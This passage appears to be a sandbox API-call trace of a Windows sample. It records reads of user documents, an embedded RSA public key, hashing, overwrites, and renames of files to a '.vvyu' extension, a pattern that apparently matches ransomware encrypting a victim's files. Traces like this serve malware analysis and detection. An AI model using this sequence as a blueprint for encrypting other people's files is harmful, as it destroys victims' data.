Flags=0x0, Size=0x64) returned 0x673558 [0196.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.051] GetCurrentThreadId () returned 0x66c [0196.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0196.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1578 | out: hHeap=0x620000) returned 1 [0196.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.062] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x8111, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x8111, lpOverlapped=0x0) returned 1 [0196.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.063] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x8116, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.063] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.064] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.065] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.065] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.065] CloseHandle (hObject=0x568) returned 1 [0196.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.069] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\84p7mNA.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\84p7mna.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\84p7mNA.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\84p7mna.doc.vvyu")) returned 1 [0196.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.078] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.081] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14871610, ftCreationTime.dwHighDateTime=0x1d8a28f, ftLastAccessTime.dwLowDateTime=0xfa7bb540, ftLastAccessTime.dwHighDateTime=0x1d8a677, ftLastWriteTime.dwLowDateTime=0xfa7bb540, ftLastWriteTime.dwHighDateTime=0x1d8a677, nFileSizeHigh=0x0, nFileSizeLow=0x9d8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8tIQYXue.odp", cAlternateFileName="")) returned 1 [0196.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.081] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\8tIQYXue.odp") returned=".odp" [0196.081] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\8tIQYXue.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\8tiqyxue.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.082] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=40333) returned 1 [0196.082] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.085] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9d67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.085] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.087] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.087] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x9d8d, lpOverlapped=0x0) returned 1 [0196.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.088] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.089] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.089] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.089] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.090] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.090] GetLastError () returned 0x0 [0196.090] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.090] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.090] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.090] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.091] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9d90) returned 0x2ea79b0 [0196.091] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1578 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea15c0 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.092] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2db0 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, 